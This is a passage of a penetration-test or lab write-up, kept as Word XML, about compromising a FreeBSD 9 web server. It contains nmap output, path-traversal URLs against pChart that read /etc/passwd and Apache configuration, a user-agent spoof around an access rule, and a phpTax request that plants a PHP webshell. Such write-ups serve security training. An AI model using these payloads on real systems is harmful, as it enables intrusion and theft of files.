      </w:r>
      <w:r>
        <w:t xml:space="preserve"> application which we can use to gain command execution as user </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>www</w:t>
      </w:r>
      <w:r>
        <w:t>. Since the machine is running FreeBSD version 9, we utilize a kernel exploit to escalate our privileges to root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE9F8" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="55" w:name="service-enumeration-1"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Service Enumeration</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55"/>
    </w:p>
    <w:p w14:paraId="70FCE9F9" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="56" w:name="portscan---tcp-1"/>
      <w:r>
        <w:t>Portscan - TCP</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:p w14:paraId="70FCE9FA" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t># Nmap 7.80 scan initiated Mon May  4 11:00:08 2020 as: nmap -sV -sC -p- -v -o nmapfull.out 10.0.0.139</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>Nmap scan report for 10.0.0.139</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>Host is up (0.00047s latency).</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>Not shown: 65532 filtered ports</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>PORT     STATE  SERVICE VERSION</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>22/tcp   closed ssh</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>80/tcp   open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">| http-methods: </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>|_  Supported Methods: HEAD</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>|_http-title: Site doesn't have a title (text/html).</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>8080/tcp open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>|_http-server-header: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>|_http-title: 403 Forbidden</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>MAC Address: 00:0C:29:FE:67:D7 (VMware)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>Read data files from: /usr/bin/../share/nmap</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t># Nmap done at Mon May  4 11:02:18 2020 -- 1 IP address (1 host up) scanned in 129.88 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE9FB" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="network-interfaces-1"/>
      <w:r>
        <w:t>Network interfaces</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57"/>
    </w:p>
    <w:p w14:paraId="70FCE9FC" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>em0: flags=8843&lt;UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST&gt; metric 0 mtu 1500</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        options=9b&lt;RXCSUM,TXCSUM,VLAN_MTU,VLAN_HWTAGGING,VLAN_HWCSUM&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        ether 00:0c:29:fe:67:d7</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        inet 10.0.0.139 netmask 0xffffff00 broadcast 10.0.0.255</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        nd6 options=29&lt;PERFORMNUD,IFDISABLED,AUTO_LINKLOCAL&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        media: Ethernet autoselect (1000baseT &lt;full-duplex&gt;)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        status: active</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>plip0: flags=8810&lt;POINTOPOINT,SIMPLEX,MULTICAST&gt; metric 0 mtu 1500</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        nd6 options=29&lt;PERFORMNUD,IFDISABLED,AUTO_LINKLOCAL&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>lo0: flags=8049&lt;UP,LOOPBACK,RUNNING,MULTICAST&gt; metric 0 mtu 16384</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        options=3&lt;RXCSUM,TXCSUM&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        inet6 ::1 prefixlen 128 </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        inet6 fe80::1%lo0 prefixlen 64 scopeid 0x3 </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        inet 127.0.0.1 netmask 0xff000000 </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        nd6 options=21&lt;PERFORMNUD,AUTO_LINKLOCAL&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ipfw0: flags=8801&lt;UP,SIMPLEX,MULTICAST&gt; metric 0 mtu 65536 </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        nd6 options=21&lt;PERFORMNUD,AUTO_LINKLOCAL&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE9FD" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="58" w:name="credentials-1"/>
      <w:r>
        <w:t>Credentials</w:t>
      </w:r>
      <w:bookmarkEnd w:id="58"/>
    </w:p>
    <w:p w14:paraId="70FCE9FE" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>N/A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE9FF" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="59" w:name="exploitation-and-proof-1"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Exploitation and proof</w:t>
      </w:r>
      <w:bookmarkEnd w:id="59"/>
    </w:p>
    <w:p w14:paraId="70FCEA00" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="60" w:name="initial-access-1"/>
      <w:r>
        <w:t>Initial access</w:t>
      </w:r>
      <w:bookmarkEnd w:id="60"/>
    </w:p>
    <w:p w14:paraId="70FCEA01" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:bookmarkStart w:id="61" w:name="vulnerability-exploitation-2"/>
      <w:r>
        <w:t>Vulnerability exploitation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="61"/>
    </w:p>
    <w:p w14:paraId="70FCEA02" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nmap finds two ports open, 80 and 8080. Port 8080 seems to reject all of our requests with an 403 error, and port 80 just returns “It works!”. However, by inspecting the source, code, we see a reference to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>/pChart2.1.3/index.php</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA03" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70FCEACE" wp14:editId="41B4951B">
            <wp:extent cx="4169551" cy="1990725"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9" name="Picture" descr="ffb80df9362fb3c922d028c49da290b3.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture" descr="_resources/5aaf06cbb9f34198ade6738ce59f6c87.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4172501" cy="1992134"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA04" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
      </w:pPr>
      <w:r>
        <w:t>ffb80df9362fb3c922d028c49da290b3.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA05" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Visiting that page, we get to see the pChart system v2.1.3 without authentication. This version seems to be vulnerable to XSS and Path Traversal, as outlined </w:t>
      </w:r>
      <w:hyperlink r:id="rId19">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>here</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">. Testing out the vulnerabilities for ourselves we can indeed read arbitrary files through the path traversal. For example, we can read </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>/etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA06" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70FCEAD0" wp14:editId="09B8F277">
            <wp:extent cx="3931093" cy="3352800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10" name="Picture" descr="3124b1f27f3ccc417fc3881795114ecd.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture" descr="_resources/8b57d11edb854ab1af23239e63b089ef.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3935979" cy="3356967"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA07" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
      </w:pPr>
      <w:r>
        <w:t>3124b1f27f3ccc417fc3881795114ecd.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA08" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The passwd file also lists we are dealing with FreeBSD 9, which is interesting since this affects the paths we are dealing with. We can find the HTTP access log here, for example.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA09" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>http://10.0.0.139/pChart2.1.3/examples/index.php?Action=View&amp;Script=%2f..%2f..%2fvar/log/httpd-access.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA0A" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Unfortunately, any PHP that we inject through user agent poisoning doesn’t seem to be executed and is reflected back to us. Looks like we’ll have to find another way in. Enumerating more files, we find the apache configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA0B" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>http://10.0.0.139/pChart2.1.3/examples/index.php?Action=View&amp;Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA0C" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Near the bottom, it contains some interesting information about the vhost on port </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>8080</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA0D" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>&lt;VirtualHost *:8080&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    DocumentRoot /usr/local/www/apache22/data2</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>&lt;Directory "/usr/local/www/apache22/data2"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    Options Indexes FollowSymLinks</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    AllowOverride All</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    Order allow,deny</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    Allow from env=Mozilla4_browser</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>&lt;/Directory&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>&lt;/VirtualHost&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA0E" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>In short, it sets an environment variable if our user agent begins with “Mozilla/4.0”, and only allows us access if the environment variable is set. AKA, we should be able to bypass the 403 errors on that port if we spoof our user agent! Using the BurpSuite proxy, we can easily spoof our user agent by using the “Match and Replace” feature.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA0F" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70FCEAD2" wp14:editId="70FCEAD3">
            <wp:extent cx="5943600" cy="807339"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11" name="Picture" descr="642f8dd49c6bded553bc000cdfb8ae0c.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture" descr="_resources/158fecfa36214df8b5c347483a9c4cec.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="807339"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA10" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
      </w:pPr>
      <w:r>
        <w:t>642f8dd49c6bded553bc000cdfb8ae0c.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA11" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We can now access the web port 8080, and find a reference to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>phptax</w:t>
      </w:r>
      <w:r>
        <w:t>. Clicking the link, we access probably the most interesting system since the start of humanity…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA12" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70FCEAD4" wp14:editId="70FCEAD5">
            <wp:extent cx="5943600" cy="5573051"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12" name="Picture" descr="e3443fadb57f048d5e1a7ee08931f0a1.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture" descr="_resources/74774e33076e4483ac3e35d52b3de13b.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="5573051"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA13" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
      </w:pPr>
      <w:r>
        <w:t>e3443fadb57f048d5e1a7ee08931f0a1.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA14" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">There’s several remote code execution vulnerabilities disclosed for this system, but most don’t seem too reliable. We finally end up with </w:t>
      </w:r>
      <w:hyperlink r:id="rId23">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>this exploit disclosure</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>, which simply seems to make one web request to place a PHP backdoor. The exploit itself is slightly unreliable, but we can easily extract and recreate the web request to place the webshell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA15" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>http://10.0.0.139:8080/phptax/index.php?field=rce.php&amp;newvalue=%3C%3Fphp%20passthru(%24_GET%5Bcmd%5D)%3B%3F%3E</w:t>
      </w:r>
    </w:p>
